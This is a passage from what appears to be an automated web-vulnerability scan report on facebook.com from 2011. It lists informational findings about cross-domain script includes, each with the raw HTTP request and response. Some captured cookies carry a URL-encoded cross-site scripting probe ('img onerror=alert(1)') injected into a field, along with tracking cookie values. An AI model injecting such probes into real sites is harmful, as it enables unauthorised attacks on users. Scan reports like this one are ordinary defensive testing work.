Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.41
Connection: close
Date: Thu, 05 May 2011 11:43:07 GMT
Content-Length: 15014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.74. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Alexander-Bucky-Jordan/1242845259

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /people/Alexander-Bucky-Jordan/1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.157.53
X-Cnection: close
Date: Thu, 05 May 2011 11:56:56 GMT
Content-Length: 44258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.75. http://www.facebook.com/people/Bucky-Jordan/100000824820783

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan/100000824820783

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /people/Bucky-Jordan/100000824820783 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bYeMg; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.233.110
X-Cnection: close
Date: Thu, 05 May 2011 02:50:59 GMT
Content-Length: 56884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.76. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.51.59
X-Cnection: close
Date: Thu, 05 May 2011 00:58:35 GMT
Content-Length: 11937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.77. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /plugins/activity.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.251.24
Connection: close
Date: Thu, 05 May 2011 10:57:03 GMT
Content-Length: 7573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yv/r/aDyW45UzMGZ.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.78. http://www.facebook.com/plugins/comments.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/comments.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /plugins/comments.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.235.110
Connection: close
Date: Thu, 05 May 2011 10:56:39 GMT
Content-Length: 5064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.79. http://www.facebook.com/plugins/comments.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/comments.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /plugins/comments.php?api_key=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d35cd15c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Faol.sportingnews.com%2Fnfl%2Fstory%2F2011-05-04%2Fathletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter&locale=en_US&numposts=10&sdk=joey&width=650 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?icid=maing-grid7%7Cmain5%7Cdl4%7Csec1_lnk3%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.43.43
X-Cnection: close
Date: Thu, 05 May 2011 00:58:07 GMT
Content-Length: 94355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/4wOZW9c83Yr.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.80. http://www.facebook.com/plugins/facepile.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/facepile.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /plugins/facepile.php?action=like&api_key=4d965afccc4d86c598dbf5d94fb34a7c&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3feba30ac%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff3196709bc%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&max_rows=2&sdk=joey&width=264 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.100.31
X-Cnection: close
Date: Thu, 05 May 2011 00:59:03 GMT
Content-Length: 6668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.81. http://www.facebook.com/plugins/facepile.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/facepile.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /plugins/facepile.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.24.112
Connection: close
Date: Thu, 05 May 2011 10:56:40 GMT
Content-Length: 11389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.82. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /plugins/like.php?action=like&api_key=132151116822711&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df214d667b%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fmmafighting.com%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F&layout=standard&locale=en_US&node_type=link&ref=article&sdk=joey&show_faces=false&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.112.63
X-Cnection: close
Date: Thu, 05 May 2011 00:57:35 GMT
Content-Length: 11323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.83. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /plugins/likebox.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b533dbd4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1450dca4c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=10&header=false&height=180&href=http%3A%2F%2Fwww.facebook.com%2Fsportingnews&locale=en_US&sdk=joey&show_faces=true&stream=false&width=298 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.73.79
X-Cnection: close
Date: Thu, 05 May 2011 00:59:40 GMT
Content-Length: 16140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.84. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /plugins/likebox.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.25.115
Connection: close
Date: Thu, 05 May 2011 10:56:43 GMT
Content-Length: 11326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.85. http://www.facebook.com/plugins/recommendations.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /plugins/recommendations.php?site=techcrunch.com&width=290&height=330&header=false&colorscheme=light&font=verdana&border_color=white HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.103.27
X-Cnection: close
Date: Thu, 05 May 2011 00:59:49 GMT
Content-Length: 12744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.86. http://www.facebook.com/plugins/recommendations.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /plugins/recommendations.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
